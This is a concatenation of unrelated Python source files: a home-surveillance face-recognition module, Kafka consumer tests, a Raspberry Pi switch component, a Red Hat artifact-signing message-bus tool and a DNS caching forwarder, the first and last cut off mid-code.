attachment.add('http://127.0.0.1:5000/camera_snapshot/{}'.format(camNum))
print("attachment", attachment)
self.apobj.notify(body=alert.alertString, title='Home Surveilance', attach=attachment)
def send_mycroft_notification_alert(self,alert):
print(">>>Mycroft<<<", alert.alertString)
host = '' # set hostname or IP of your Mycroft device here
if host:
uri = 'ws://' + host + ':8181/core'
ws = create_connection(uri)
message = '{"type": "speak", "data": {"utterance": "' + alert.alertString + '"}, "context":{}}'
result = ws.send(message)
print("Received '%s'" % result)
ws.close()
def add_face(self,name,image, upload):
"""Adds face to directory used for training the classifier"""
if upload == False:
path = fileDir + "/aligned-images/"
else:
path = fileDir + "/training-images/"
num = 0
if not os.path.exists(path + name):
try:
logger.info( "Creating New Face Dircectory: " + name)
os.makedirs(path+name)
except OSError:
logger.info( OSError)
return False
pass
else:
num = len([nam for nam in os.listdir(path +name) if os.path.isfile(os.path.join(path+name, nam))])
logger.info( "Writing Image To Directory: " + name)
cv2.imwrite(path+name+"/"+ name + "_"+str(num) + ".png", image)
self.get_face_database_names()
return True
def get_face_database_names(self):
"""Gets all the names that were most recently
used to train the classifier"""
path = fileDir + "/aligned-images/"
self.peopleDB = []
for name in os.listdir(path):
if (name == 'cache.t7' or name.startswith('.') or name[0:7] == 'unknown'):
continue
self.peopleDB.append(name)
logger.info("Known faces in our db for: " + name + " ")
self.peopleDB.append('unknown')
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
class Person(object):
"""Person object simply holds all the
person's information for other processes
"""
person_count = 0
def __init__(self,rep,confidence = 0, face = None, name = "unknown"):
print(">Person: confidence", confidence, "face", face is not None, "name", name)
if "unknown" not in name: # Used to include unknown-N from Database
self.identity = name
else:
self.identity = "unknown"
self.count = Person.person_count
self.confidence = confidence
self.thumbnails = []
self.face = face
self.rep = rep # Face representation
if face is not None:
ret, jpeg = cv2.imencode('.jpg', face) # Convert to jpg to be viewed by client
self.thumbnail = jpeg.tostring()
self.thumbnails.append(self.thumbnail)
Person.person_count += 1
now = datetime.now() + timedelta(hours=2)
self.time = now.strftime("%A %d %B %Y %I:%M:%S%p")
self.istracked = False
def set_rep(self, rep):
self.rep = rep
def set_identity(self, identity):
self.identity = identity
def set_time(self): # Update time when person was detected
now = datetime.now() + timedelta(hours=2)
self.time = now.strftime("%A %d %B %Y %I:%M:%S%p")
def set_thumbnail(self, face):
self.face = face
ret, jpeg = cv2.imencode('.jpg', face) # Convert to jpg to be viewed by client
self.thumbnail = jpeg.tostring()
def add_to_thumbnails(self, face):
ret, jpeg = cv2.imencode('.jpg', face) # Convert to jpg to be viewed by client
self.thumbnails.append(jpeg.tostring())
class Tracker:
"""Keeps track of person position"""
tracker_count = 0
def __init__(self, img, bb, person, id):
self.id = id
self.person = person
self.bb = bb
self.pings = 0
self.facepings = 0
def reset_pinger(self):
self.pings = 0
def reset_face_pinger(self):
self.facepings = 0
def update_tracker(self,bb):
self.bb = bb
def overlap(self, bb):
p = float(self.bb.intersect(bb).area()) / float(self.bb.area())
return p > 0.2
def ping(self):
self.pings += 1
def faceping(self):
self.facepings += 1
class Alert(object):
"""Holds all the alert details and is continually checked by
the alert monitoring thread"""
alert_count = 1
def __init__(self,alarmState,camera, event, person, actions, emailAddress, confidence):
logger.info( "alert_"+str(Alert.alert_count)+ " created")
if event == 'Motion':
self.alertString = "Motion detected in camera " + camera
else:
self.alertString = person + " was recognised in camera " + camera + " with a confidence greater than " + str(confidence)
self.id = "alert_" + str(Alert.alert_count)
self.event_occurred = False
self.action_taken = False
self.camera = camera
self.alarmState = alarmState
self.event = event
self.person = person
self.confidence = confidence
self.actions = actions
if emailAddress == None:
self.emailAddress = "bjjoffe@gmail.com"
else:
self.emailAddress = emailAddress
self.eventTime = 0
Alert.alert_count += 1
def reinitialise(self):
self.event_occurred = False
self.action_taken = False
def set_custom_alertmessage(self,message):
self.alertString = message
|
test_consumer_group.py
|
import collections
import logging
import threading
import time
import pytest
from kafka.vendor import six
from kafka.conn import ConnectionStates
from kafka.consumer.group import KafkaConsumer
from kafka.coordinator.base import MemberState, Generation
from kafka.structs import TopicPartition
from test.fixtures import random_string, version
def get_connect_str(kafka_broker):
return kafka_broker.host + ':' + str(kafka_broker.port)
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_consumer(kafka_broker, topic, version):
# The `topic` fixture is included because
# 0.8.2 brokers need a topic to function well
consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
consumer.poll(500)
assert len(consumer._client._conns) > 0
node_id = list(consumer._client._conns.keys())[0]
assert consumer._client._conns[node_id].state is ConnectionStates.CONNECTED
consumer.close()
@pytest.mark.skipif(version() < (0, 9), reason='Unsupported Kafka Version')
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_group(kafka_broker, topic):
num_partitions = 4
connect_str = get_connect_str(kafka_broker)
consumers = {}
stop = {}
threads = {}
messages = collections.defaultdict(list)
group_id = 'test-group-' + random_string(6)
def consumer_thread(i):
assert i not in consumers
assert i not in stop
stop[i] = threading.Event()
consumers[i] = KafkaConsumer(topic,
bootstrap_servers=connect_str,
group_id=group_id,
heartbeat_interval_ms=500)
while not stop[i].is_set():
for tp, records in six.itervalues(consumers[i].poll(100)):
messages[i][tp].extend(records)
consumers[i].close()
consumers[i] = None
stop[i] = None
num_consumers = 4
for i in range(num_consumers):
t = threading.Thread(target=consumer_thread, args=(i,))
t.start()
threads[i] = t
try:
timeout = time.time() + 35
while True:
for c in range(num_consumers):
# Verify all consumers have been created
if c not in consumers:
break
# Verify all consumers have an assignment
elif not consumers[c].assignment():
break
# If all consumers exist and have an assignment
else:
logging.info('All consumers have assignment... checking for stable group')
# Verify all consumers are in the same generation
# then log state and break while loop
generations = set([consumer._coordinator._generation.generation_id
for consumer in list(consumers.values())])
# New generation assignment is not complete until
# coordinator.rejoining = False
rejoining = any([consumer._coordinator.rejoining
for consumer in list(consumers.values())])
if not rejoining and len(generations) == 1:
for c, consumer in list(consumers.items()):
logging.info("[%s] %s %s: %s", c,
consumer._coordinator._generation.generation_id,
consumer._coordinator._generation.member_id,
consumer.assignment())
break
else:
logging.info('Rejoining: %s, generations: %s', rejoining, generations)
time.sleep(1)
assert time.time() < timeout, "timeout waiting for assignments"
logging.info('Group stabilized; verifying assignment')
group_assignment = set()
for c in range(num_consumers):
assert len(consumers[c].assignment()) != 0
assert set.isdisjoint(consumers[c].assignment(), group_assignment)
group_assignment.update(consumers[c].assignment())
assert group_assignment == set([
TopicPartition(topic, partition)
for partition in range(num_partitions)])
logging.info('Assignment looks good!')
finally:
logging.info('Shutting down %s consumers', num_consumers)
for c in range(num_consumers):
logging.info('Stopping consumer %s', c)
stop[c].set()
threads[c].join()
threads[c] = None
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_paused(kafka_broker, topic):
consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
topics = [TopicPartition(topic, 1)]
consumer.assign(topics)
assert set(topics) == consumer.assignment()
assert set() == consumer.paused()
consumer.pause(topics[0])
assert set([topics[0]]) == consumer.paused()
consumer.resume(topics[0])
assert set() == consumer.paused()
consumer.unsubscribe()
assert set() == consumer.paused()
consumer.close()
@pytest.mark.skipif(version() < (0, 9), reason='Unsupported Kafka Version')
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_heartbeat_thread(kafka_broker, topic):
group_id = 'test-group-' + random_string(6)
consumer = KafkaConsumer(topic,
bootstrap_servers=get_connect_str(kafka_broker),
group_id=group_id,
heartbeat_interval_ms=500)
# poll until we have joined group / have assignment
while not consumer.assignment():
consumer.poll(timeout_ms=100)
assert consumer._coordinator.state is MemberState.STABLE
last_poll = consumer._coordinator.heartbeat.last_poll
last_beat = consumer._coordinator.heartbeat.last_send
timeout = time.time() + 30
while True:
if time.time() > timeout:
raise RuntimeError('timeout waiting for heartbeat')
if consumer._coordinator.heartbeat.last_send > last_beat:
break
time.sleep(0.5)
assert consumer._coordinator.heartbeat.last_poll == last_poll
consumer.poll(timeout_ms=100)
assert consumer._coordinator.heartbeat.last_poll > last_poll
consumer.close()
|
switch_component.py
|
"""This module contains the SwitchComponent type."""
import threading
from raspy.argument_null_exception import ArgumentNullException
from raspy.invalid_operation_exception import InvalidOperationException
from raspy.object_disposed_exception import ObjectDisposedException
from raspy.components.switches import switch_state
from raspy.components.switches.switch import Switch
from raspy.components.switches.switch_state_change_event import SwitchStateChangeEvent
from raspy.io import pin_mode
from raspy.io import pin_state
from raspy.io import gpio
from raspy.pi_system import core_utils
OFF_STATE = pin_state.LOW
"""The pin state to consider the switch off."""
ON_STATE = pin_state.HIGH
"""The pin state to consider the switch on."""
class SwitchComponent(Switch):
"""A component that is an abstraction of a standard switch."""
def __init__(self, pin):
"""Initialize a new instance of SwitchComponent.
:param gpio.Gpio pin: The input pin the switch is attached to.
:raises: ArgumentNullException if pin is None.
"""
Switch.__init__(self)
if pin is None:
raise ArgumentNullException("'pin' param cannot be None.")
self.__isPolling = False
self.__pollThread = None
self.__stopEvent = threading.Event()
self.__stopEvent.set()
self.__pin = pin
self.__pin.provision()
self.__pin.on(gpio.EVENT_GPIO_STATE_CHANGED,
lambda evt: self._on_pin_state_changed(evt))
def _on_pin_state_changed(self, psce):
"""Handle the pin state change event.
This verifies the state has actually changed, then fires the switch
state change event.
:param raspy.io.pin_state_change_event.PinStateChangeEvent psce: The
pin state change event info.
"""
if psce.new_state != psce.old_state:
evt = SwitchStateChangeEvent(switch_state.ON, switch_state.OFF)
if psce.new_state == ON_STATE:
evt = SwitchStateChangeEvent(switch_state.OFF, switch_state.ON)
self.on_switch_state_changed(evt)
@property
def pin(self):
"""Get the GPIO pin this switch is attached to.
:returns: The underlying physical pin.
:rtype: gpio.Gpio
"""
return self.__pin
@property
def state(self):
"""Get the state of the switch.
:returns: The switch state.
:rtype: int
"""
if self.__pin.state == ON_STATE:
return switch_state.ON
return switch_state.OFF
@property
def is_polling(self):
"""Check to see if the switch is in poll mode."""
return self.__isPolling
def _execute_poll(self):
"""Execute the poll cycle."""
while not self.__stopEvent.is_set():
self.__pin.read()
core_utils.sleep(500)
def poll(self):
"""Poll the switch status.
:raises: ObjectDisposedException if this instance has been disposed.
:raises: InvalidOperationException if this switch is attached to a
pin that has not been configured as an input.
"""
if self.is_disposed:
raise ObjectDisposedException("SwitchComponent")
if self.__pin.mode != pin_mode.IN:
msg = "The pin this switch is attached to must be configured"
msg += " as an input."
raise InvalidOperationException(msg)
if self.__isPolling:
return
self.__stopEvent.clear()
self.__isPolling = True
self.__pollThread = threading.Thread(target=self._execute_poll)
self.__pollThread.name = "SwitchComponentPollThread"
self.__pollThread.daemon = True
self.__pollThread.start()
def interrupt_poll(self):
"""Interrupt the poll cycle."""
if not self.__isPolling or self.is_disposed:
return
if self.__stopEvent.is_set() or self.__pollThread is None:
return
self.__stopEvent.set()
self.__isPolling = False
def dispose(self):
"""Release managed resources used by this component."""
if self.is_disposed:
return
self.interrupt_poll()
if self.__pin is not None:
self.__pin.dispose()
self.__pin = None
self.__stopEvent = None
self.__pollThread = None
Switch.dispose(self)
|
umb_producer.py
|
#!/usr/bin/env python2
import base64
import json
import logging
import ssl
import subprocess
import sys
import threading
import click
import requests
from rhmsg.activemq.producer import AMQProducer
from rhmsg.activemq.consumer import AMQConsumer
# Expose errors during signing for debugging
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
######################################################################
URLS = {
'dev': (
'amqps://messaging-devops-broker03.dev1.ext.devlab.redhat.com:5671',
'amqps://messaging-devops-broker04.dev1.ext.devlab.redhat.com:5671',
),
'qa': (
'amqps://messaging-devops-broker03.web.qa.ext.phx1.redhat.com:5671',
'amqps://messaging-devops-broker04.web.qa.ext.phx1.redhat.com:5671',
),
'stage': (
'amqps://messaging-devops-broker03.web.stage.ext.phx2.redhat.com:5671',
'amqps://messaging-devops-broker04.web.stage.ext.phx2.redhat.com:5671',
),
'prod': (
'amqps://messaging-devops-broker03.web.prod.ext.phx2.redhat.com:5671',
'amqps://messaging-devops-broker04.web.prod.ext.phx2.redhat.com:5671',
),
}
TOPIC = 'VirtualTopic.eng.art.artifact.sign'
# TODO: In the future we need to handle 'rhcos' having '4.1'
# hard-coded into the URL path.
MESSAGE_DIGESTS = {
'openshift': 'https://mirror.openshift.com/pub/openshift-v4/{arch}/clients/{release_stage}/{release_name}/sha256sum.txt',
'rhcos': 'https://mirror.openshift.com/pub/openshift-v4/{arch}/dependencies/rhcos/{release_name_xy}/{release_name}/sha256sum.txt'
}
DEFAULT_CA_CHAIN = "/etc/pki/ca-trust/source/anchors/RH-IT-Root-CA.crt"
# This is the JSON we send OVER the bus when requesting signatures
SIGN_REQUEST_MESSAGE_FIELDS = [
"artifact",
# Added by ART
"artifact_meta",
"request_id",
"requestor",
"sig_keyname",
]
ART_CONSUMER = 'Consumer.openshift-art-signatory.{env}.VirtualTopic.eng.robosignatory.art.sign'
def get_release_tag(release_name, arch):
"""Determine the quay destination tag where a release image lives, based on the
release name and arch (since we can now have multiple arches for each release name)
- make sure it includes the arch in the tag to distinguish from any other releases of same name.
e.g.:
(4.2.0-0.nightly-s390x-2019-12-10-202536, s390x) remains 4.2.0-0.nightly-s390x-2019-12-10-202536
(4.3.0-0.nightly-2019-12-07-121211, x86_64) becomes 4.3.0-0.nightly-2019-12-07-121211-x86_64
"""
return release_name if arch in release_name else "{}-{}".format(release_name, arch)
######################################################################
# Click stuff! Define these here and reuse them later because having
# 'required' options in the global context creates a poor user
# experience. Running "this-script <sub-command> --help" won't work
# until every global required option is provided.
context_settings = dict(help_option_names=['-h', '--help'])
requestor = click.option("--requestor", required=True, metavar="USERID",
help="The user who requested the signature")
product = click.option("--product", required=True,
type=click.Choice(["openshift", "rhcos"]),
help="Which product this signature is for")
request_id = click.option("--request-id", required=True, metavar="BUILDURL",
help="Unique build job identifier for this signing request, "
"use the job URL from Jenkins: $env.BUILD_URL")
sig_keyname = click.option("--sig-keyname", required=True,
type=click.Choice(['test', 'redhatrelease2', 'beta2']),
help="Name of the key to have sign our request")
release_name_opt = click.option("--release-name", required=True, metavar="SEMVER",
help="Numerical name of this release, for example: 4.1.0-rc.10")
arch_opt = click.option("--arch", required=True, metavar="ARCHITECTURE",
type=click.Choice(['x86_64', 'ppc64le', 's390x']),
help="Which architecture this release was built for")
client_type = click.option("--client-type", required=True, metavar="VAL",
type=click.Choice(['ocp', 'ocp-dev-preview']),
help="What type of client needs to be signed")
client_cert = click.option("--client-cert", required=True, metavar="CERT-PATH",
type=click.Path(exists=True),
help="Path to the client certificate for UMB authentication")
client_key = click.option("--client-key", required=True, metavar="KEY-PATH",
type=click.Path(exists=True),
help="Path to the client key for UMB authentication")
env = click.option("--env", required=False, metavar="ENVIRONMENT",
default='stage',
type=click.Choice(['dev', 'stage', 'prod']),
help="Which UMB environment to send to")
noop = click.option("--noop", type=bool, is_flag=True, default=False,
help="If given, DO NOT request signature, "
"show the JSON that WOULD be sent over the bus")
ca_certs = click.option("--ca-certs", type=click.Path(exists=True),
default=DEFAULT_CA_CHAIN,
help="Manually specify the path to the RHIT CA Trust Chain. "
"Default: {}".format(DEFAULT_CA_CHAIN))
digest = click.option("--digest", metavar="DIGEST", help="Pass the digest that should be signed")
# ---------------------------------------------------------------------
@click.group(context_settings=context_settings)
def cli(**kwargs):
"""Helper utility for internal Red Hat use ONLY. Use in a build job to
request signatures for various artifacts produced as part of an
Openshift 4.x release. Signatures are requested by sending a JSON blob
over the Universal Message Bus to the 'robosignatory' (RADAS).
You may override the default path to look for the Red Hat IT
Certificate Authority trust chain by using the --ca-certs option in
the global context (before the sub-command).
"""
pass
######################################################################
# Helpers
def get_digest_base64(location):
"""Download the sha256sum.txt message digest file at the given
`location`.
:return: A `string` of the base64-encoded message digest
"""
res = requests.get(location,
verify=ssl.get_default_verify_paths().openssl_cafile)
if res.status_code == 200:
# b64encode needs a bytes type input, use the dedicated
# 'encode' method to turn str=>bytes. The result of
# `b64encode` is a bytes type. Later when we go to serialize
# this with json it needs to be a str type so we will decode
# the bytes=>str now.
return base64.b64encode(res.text.encode()).decode()
else:
raise(Exception(res.reason))
def presend_validation(message):
"""Verify the message we want to send over the bus has all the
required fields
"""
for field in SIGN_REQUEST_MESSAGE_FIELDS:
if field not in message:
return field
return True
def oc_image_info(pullspec):
"""Get metadata for an image at the given `pullspec`
:return: a dict with the serialzed JSON from the 'oc image info'
call
"""
image_info_raw = subprocess.check_output(
['oc', 'image', 'info', '-o', 'json', pullspec])
return json.loads(image_info_raw)
def get_bus_producer(env, certificate, private_key, trusted_certificates):
"""This is just a wrapper around creating a producer. We're going to
need this in multiple places so we want to ensure we do it the
same way each time.
"""
return AMQProducer(urls=URLS[env or 'stage'],
certificate=certificate,
private_key=private_key,
trusted_certificates=trusted_certificates,
topic=TOPIC)
def producer_thread(producer, args):
print(args)
producer.send_msg(*args)
def producer_send_msg(producer, *args):
t = threading.Thread(target=producer_thread, args=(producer, args))
t.start()
t.join()
def get_bus_consumer(env, certificate, private_key, trusted_certificates):
"""This is just a wrapper around creating a consumer. We're going to
do need this in multiple places though, so we want to ensure we do it
the same way each time.
"""
return AMQConsumer(urls=URLS[env or 'stage'], certificate=certificate,
private_key=private_key, trusted_certificates=trusted_certificates)
def art_consumer_callback(msg, notsure):
"""`msg` is a `Message` object which has various attributes. Such as `body`.
`notsure` I am not sure what that is. I only got as far as knowing
this callback requires two parameters.
"""
print(msg)
body = json.loads(msg.body)
print(json.dumps(body, indent=4))
if body['msg']['signing_status'] != 'success':
print("ERROR: robosignatory failed to sign artifact")
exit(1)
else:
# example: https://datagrepper.stage.engineering.redhat.com/id?id=2019-0304004b-d1e6-4e03-b28d-cfa1e5f59948&is_raw=true&size=extra-large
result = body['msg']['signed_artifact']
out_file = body['msg']['artifact_meta']['name']
with open(out_file, 'w') as fp:
fp.write(base64.decodestring(result))
fp.flush()
print("Wrote {} to disk".format(body['msg']['artifact_meta']['name']))
return True
def consumer_thread(consumer):
consumer.consume(ART_CONSUMER.format(env=env), art_consumer_callback)
def consumer_start(consumer):
t = threading.Thread(target=consumer_thread, args=(consumer,))
t.start()
return t
def get_producer_consumer(env, certificate, private_key, trusted_certificates):
producer = get_bus_producer(env, certificate, private_key, trusted_certificates)
consumer = get_bus_consumer(env, certificate, private_key, trusted_certificates)
return (producer, consumer)
######################################################################
@cli.command("message-digest", short_help="Sign a sha256sum.txt file")
@requestor
@product
@request_id
@sig_keyname
@release_name_opt
@client_cert
@client_key
@client_type
@env
@noop
@ca_certs
@arch_opt
@click.pass_context
def message_digest(ctx, requestor, product, request_id, sig_keyname,
release_name, client_cert, client_key, client_type, env, noop,
ca_certs, arch):
"""Sign a 'message digest'. These are sha256sum.txt files produced by
the 'sha256sum` command (hence the strange command name). In the ART
world, this is for signing message digests from extracting OpenShift
tools, as well as RHCOS bare-betal message digests.
"""
if product == 'openshift':
artifact_url = MESSAGE_DIGESTS[product].format(
arch=arch,
release_name=release_name,
release_stage=client_type)
elif product == 'rhcos':
release_parts = release_name.split('.')
artifact_url = MESSAGE_DIGESTS[product].format(
arch=arch,
release_name_xy='.'.join(release_parts[:2]),
release_name=release_name)
artifact = get_digest_base64(artifact_url)
message = {
"artifact": artifact,
"artifact_meta": {
"product": product,
"release_name": release_name,
"name": "sha256sum.txt.gpg",
"type": "message-digest",
},
"request_id": request_id,
"requestor": requestor,
"sig_keyname": sig_keyname,
}
validated = presend_validation(message)
if validated is True:
print("Message contains all required fields")
to_send = json.dumps(message)
else:
print("Message missing required field: {}".format(validated))
exit(1)
if noop:
print("Message we would have sent over the bus:")
print(to_send)
else:
producer, consumer = get_producer_consumer(env, client_cert, client_key, ca_certs)
consumer_thread = consumer_start(consumer)
producer_send_msg(producer, {}, to_send)
print("Message we sent over the bus:")
print(to_send)
print("Submitted request for signing. The mirror-artifacts job should be triggered when a response is sent back")
print("Waiting for consumer to receive data back from request")
consumer_thread.join()
######################################################################
@cli.command("json-digest", short_help="Sign a JSON digest claim")
@requestor
@product
@request_id
@sig_keyname
@release_name_opt
@client_cert
@client_key
@client_type
@env
@noop
@ca_certs
@digest
@arch_opt
@click.pass_context
def json_digest(ctx, requestor, product, request_id, sig_keyname,
release_name, client_cert, client_key, client_type, env, noop,
ca_certs, digest, arch):
"""Sign a 'json digest'. These are JSON blobs that associate a
pullspec with a sha256 digest. In the ART world, this is for "signing
payload images". After the json digest is signed we publish the
signature in a location which follows a specific directory pattern,
thus allowing the signature to be looked up programmatically.
"""
json_claim = {
"critical": {
"image": {
"docker-manifest-digest": None
},
"type": "atomic container signature",
"identity": {
"docker-reference": None,
}
},
"optional": {
"creator": "Red Hat OpenShift Signing Authority 0.0.1",
},
}
release_stage = "ocp-release-nightly" if client_type == 'ocp-dev-preview' else "ocp-release"
release_tag = get_release_tag(release_name, arch)
pullspec = "quay.io/openshift-release-dev/{}:{}".format(release_stage, release_tag)
json_claim['critical']['identity']['docker-reference'] = pullspec
if not digest:
digest = oc_image_info(pullspec)['digest']
json_claim['critical']['image']['docker-manifest-digest'] = digest
print("ARTIFACT to send for signing (WILL BE base64 encoded first):")
print(json.dumps(json_claim, indent=4))
message = {
"artifact": base64.b64encode(json.dumps(json_claim).encode()).decode(),
"artifact_meta": {
"product": product,
"release_name": release_name,
"name": json_claim['critical']['image']['docker-manifest-digest'].replace(':', '='),
"type": "json-digest",
},
"request_id": request_id,
"requestor": requestor,
"sig_keyname": sig_keyname,
}
validated = presend_validation(message)
if validated is True:
print("Message contains all required fields")
to_send = json.dumps(message)
else:
print("Message missing required field: {}".format(validated))
exit(1)
if noop:
print("Message we would have sent over the bus:")
print(to_send)
else:
producer, consumer = get_producer_consumer(env, client_cert, client_key, ca_certs)
consumer_thread = consumer_start(consumer)
producer_send_msg(producer, {}, to_send)
print("Message we sent over the bus:")
print(to_send)
print("Submitted request for signing. The mirror-artifacts job should be triggered when a response is sent back")
print("Waiting for consumer to receive data back from request")
consumer_thread.join()
######################################################################
if __name__ == '__main__':
cli()
|
doh-cache-fork.py
|
#!/usr/bin/env python3
import asyncio
import types, time
import random, struct
import argparse, logging
import dns.resolver
import dns.message
import socket
import threading
import multiprocessing as mp
import aioprocessing as aiomp
import multiprocessing.managers
# Attempt to use uvloop if installed for extra performance
# try:
# import uvloop
# asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
# except ImportError:
# pass
# Handle command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('-a', '--listen-address', default='localhost',
help='address to listen on for DNS over HTTPS requests (default: %(default)s)')
parser.add_argument('-p', '--listen-port', type=int, default=53,
help='port to listen on for DNS over HTTPS requests (default: %(default)s)')
parser.add_argument('-u', '--upstreams', nargs='+', default=['1.1.1.1', '1.0.0.1'],
help='upstream servers to forward DNS queries and requests to (default: %(default)s)')
parser.add_argument('-t', '--tcp', action='store_true', default=False,
help='serve TCP based queries and requests along with UDP (default: %(default)s)')
parser.add_argument('-m', '--max-cache-size', type=int, default=10000,
help='maximum size of the cache in dns records (default: %(default)s)')
parser.add_argument('--active', action='store_true', default=False,
help='actively replace expired cache entries by performing upstream requests (default: %(default)s)')
parser.add_argument('--timeout', type=float, default=5.0,
help='time to wait before giving up on a request (default: %(default)s seconds)')
args = parser.parse_args()
host = args.listen_address
port = args.listen_port
upstreams = args.upstreams
cache_size = args.max_cache_size
active = args.active
timeout = args.timeout
# Basic diagram
# Q Q
# listener -> cache {} -> forwarder
# Q Q
# Queue for listener to post requests and get responses
cache_request = aiomp.AioQueue()
cache_response = aiomp.AioQueue()
forwarder_request = aiomp.AioQueue()
forwarder_response = aiomp.AioQueue()
def main():
# Setup logging
logging.basicConfig(level='INFO', format='[%(levelname)s] %(message)s')
# Setup resolver cache
workers = []
cache = DnsLruCache(cache_size)
wait_table = DnsWaitTable()
# p4 = mp.Process(target=echo_worker, args=(forwarder_request, forwarder_response), daemon=True)
# workers.append(p4)
p = mp.Process(target=cache_worker, args=(cache, wait_table, cache_request, cache_response, forwarder_request, forwarder_response), daemon=True)
workers.append(p)
p = mp.Process(target=forwarder_worker, args=((upstreams[0], 53), timeout, forwarder_request, forwarder_response), daemon=True)
workers.append(p)
# Setup event loop
loop = asyncio.get_event_loop()
# Setup UDP server
logging.info('Starting UDP server listening on: %s#%d' % (host, port))
udp_listen = loop.create_datagram_endpoint(lambda: UdpDnsListen(cache_response, cache_request), local_addr = (host, port))
udp, protocol = loop.run_until_complete(udp_listen)
# Setup TCP server
if args.tcp:
logging.info('Starting TCP server listening on %s#%d' % (host, port))
tcp_listen = loop.create_server(TcpDnsListen, host, port)
tcp = loop.run_until_complete(tcp_listen)
# Serve forever
try:
for worker in workers:
worker.start()
loop.run_forever()
except (KeyboardInterrupt, SystemExit):
pass
# Close listening servers and event loop
udp.close()
if args.tcp:
tcp.close()
loop.close()
class UdpDnsListen(asyncio.DatagramProtocol):
"""
DNS over UDP listener.
"""
def __init__(self, in_queue, out_queue, **kwargs):
self.in_queue = in_queue
self.out_queue = out_queue
super().__init__(**kwargs)
def connection_made(self, transport):
self.transport = transport
def datagram_received(self, data, addr):
asyncio.ensure_future(self.process_packet(data, addr))
def error_received(self, exc):
logging.warning('Minor transport error')
async def process_packet(self, query, addr):
# Post query to cache -> (query, addr)
logging.debug('LISTENER: Cache POST %s' % (addr[0]))
self.out_queue.put((query, addr))
# Get response from cache <- (answer, addr)
answer, addr = await self.in_queue.coro_get()
logging.debug('LISTENER: Cache GET %s' % (addr[0]))
# Send DNS packet to client
self.transport.sendto(answer, addr)
class TcpDnsListen(asyncio.Protocol):
"""
DNS over TCP listener.
"""
def connection_made(self, transport):
self.transport = transport
def data_received(self, data):
asyncio.ensure_future(self.process_packet(data))
def eof_received(self):
if self.transport.can_write_eof():
self.transport.write_eof()
def connection_lost(self, exc):
self.transport.close()
async def process_packet(self, data):
pass
class DnsRequest:
"""
DNS request object used for associating responses.
"""
def __init__(self, qname, qtype, qclass):
self.qname = qname
self.qtype = qtype
self.qclass = qclass
class DnsWaitTableEntry:
"""
DNS waiting table entry.
"""
def __init__(self, start, wait_list=None):
self.start = start
self.wait_list = wait_list
if self.wait_list is None:
self.wait_list = []
class DnsWaitTable:
"""
DNS waiting table to store clients waiting on DNS requests.
"""
def __init__(self, lock=None):
self.table = {}
self.lock = lock
if self.lock is None:
self.lock = threading.Lock()
def get(self, key):
return self.table.get(key)
def set(self, key, value):
self.table[key] = value
def delete(self, key):
try:
del self.table[key]
except KeyError:
pass
class DnsLruCacheNode:
"""
DNS LRU cache entry.
"""
def __init__(self, key, value):
self.key = key
self.value = value
self.prev = self
self.next = self
def link_before(self, node):
self.prev = node.prev
self.next = node
node.prev.next = self
node.prev = self
def link_after(self, node):
self.prev = node
self.next = node.next
node.next.prev = self
node.next = self
def unlink(self):
self.next.prev = self.prev
self.prev.next = self.next
class DnsLruCache:
"""
DNS LRU cache to store recently processes lookups.
"""
def __init__(self, size=100000):
self.data = {}
self.sentinel = DnsLruCacheNode(None, None)
self.hits = 0
self.misses = 0
self.size = size
if self.size < 1:
self.size = 1
def get(self, key):
"""
Returns value associated with key.
"""
# Attempt to lookup data
node = self.data.get(key)
if node is None:
self.misses += 1
return None
# Unlink because we're either going to move the node to the front
# of the LRU list or we're going to free it.
node.unlink()
# Check if data is expired
if node.value.expiration <= time.time():
del self.data[node.key]
return None
node.link_after(self.sentinel)
# Return data with updated ttl
response = node.value.response
ttl = int(node.value.expiration - time.time())
for section in (response.answer, response.authority, response.additional):
for rr in section:
rr.ttl = ttl
self.hits += 1
return node.value
def put(self, key, value):
"""
Associate key and value in the cache.
"""
node = self.data.get(key)
# Remove previous entry in this position
if node is not None:
node.unlink()
del self.data[node.key]
# Clean out least used entries if necessary
while len(self.data) >= self.size:
node = self.sentinel.prev
node.unlink()
del self.data[node.key]
# Add entry to cache
node = DnsLruCacheNode(key, value)
node.link_after(self.sentinel)
self.data[key] = node
def flush(self, key=None):
"""
Flush the cache of entries.
"""
# Flush only key if given
if key is not None:
node = self.data.get(key)
if node is not None:
node.unlink()
del self.data[node.key]
else:
node = self.sentinel.next
# Remove references to all entry nodes
while node != self.sentinel:
next = node.next
node.prev = None
node.next = None
node = next
# Reset cache
self.data = {}
self.hits = 0
self.misses = 0
def ratio(self):
"""
Return cache hit ratio since creation or last full flush.
"""
if (self.hits + self.misses) > 0:
return self.hits / (self.hits + self.misses)
else:
return 0
def expired(self, timeout):
"""
Returns list of expired or almost expired cache entries.
"""
expired = []
for k, v in self.data.items():
if v.value.expiration <= time.time() + timeout:
expired.append(k)
return expired
################################################################################
def cache_worker(cache, wait_table, in_queue, out_queue, next_in, next_out):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
asyncio.ensure_future(cache_async_read(cache, wait_table, in_queue, out_queue, next_in))
asyncio.ensure_future(cache_async_write(cache, wait_table, out_queue, next_out))
if active:
# threading.Thread(target=active_cache, args=(cache, 10, next_in), daemon=True).start()
asyncio.ensure_future(active_cache_async(cache, 10, next_in))
loop.run_forever()
async def cache_async_read(cache, wait_table, in_queue, out_queue, next_in):
while True:
# Get query from client <- (query, addr)
query, addr = await in_queue.coro_get()
request = dns.message.from_wire(query)
id = request.id
request = request.question[0]
request = DnsRequest(request.name, request.rdtype, request.rdclass)
logging.debug('CACHE: Client GET %s' % (request.qname))
# Answer query from cache if possible
response = cache.get((request.qname, request.qtype, request.qclass))
if response is not None:
response.response.id = id
answer = response.response.to_wire()
# Post response to client -> (answer, addr)
logging.debug('CACHE: Client POST %s' % (request.qname))
out_queue.put((answer, addr))
continue
# Add client to wait list for this query
entry = wait_table.get((request.qname, request.qtype, request.qclass))
